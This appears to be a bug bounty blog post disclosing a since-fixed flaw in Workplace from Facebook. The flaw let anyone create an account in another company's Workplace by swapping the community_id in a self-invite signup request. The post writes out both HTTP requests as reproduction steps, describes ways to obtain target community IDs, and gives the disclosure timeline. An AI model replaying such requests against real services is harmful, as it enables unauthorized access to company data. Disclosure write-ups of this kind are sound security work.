Workplace from Facebook | Unauthorized access to companies environment
Hello Everyone,
In this article, I will be describing a serious vulnerability I found in Workplace, an enterprise social network from Facebook.
Description:
In Workplace, the administrators can choose to activate an option called “self-invite”, which allows anyone to enter without having a verified email address by the admin.
Info: https://www.workplace.com/help/work/336227380906523
Although, the server wasn’t correctly verifying the email used on registration, allowing the creation of accounts through an email that wasn’t verified by the administrator.
This could have allowed a malicious user to access a company’s Workplace environment. But, this was only possible if the company enabled the self-invite feature.
Details:
I was able to find this issue by analyzing network traffic on the “Workplace from Facebook” Android application.
==
- After registering a new account in my Workplace and revising Burp Suite history tab, I came across the following request:
After some tests with this endpoint, I concluded that was possible to create accounts in other Workplaces just by modifying “community_id”
Using a personal email account (@gmail.com), it was already possible to execute the vulnerability.
Reproduction Steps:
- Requesting Activation Code:
POST /at_work/accounts_send_notification HTTP/1.1
Host: graph.workplace.comidentifier=test@gmail.com
pre_login_flow_type=SIGNUP
access_token=*****
Activation code successfully received.
2. Create a Facebook Workplace account:
POST /at_work/accounts_self_invite HTTP/1.1
Host: graph.workplace.comidentifier=test@gmail.com
nonce=998236
community_id=86381-----------
form_data={"name":"Test","password":"Test1234@"}
access_token=*****
nonce: activation code from first step.community_id: Target company’s community ID.
==
Boom! The account has been successfully created, and now the attacker has free access to the files, photos, groups, emails and other data from the target company.
Without counting employees exposure…
==
However…
- The attacker had to have the ID from the target company’s community. This was possible to get through brute force, or with some ex-employee from the company.
- Some days after I received the bounty, I was able to find an endpoint which gives the community_id from any company in Workplace.
Timeline:
January 11, 2021 — Initial Report
January 25, 2021 — Triaged
February 9, 2021 — Bug Fixed
February 23, 2021 — Bounty awarded (27,5k)
Thank you for taking the time to read my article
My Twitter profile: https://twitter.com/mvinni_
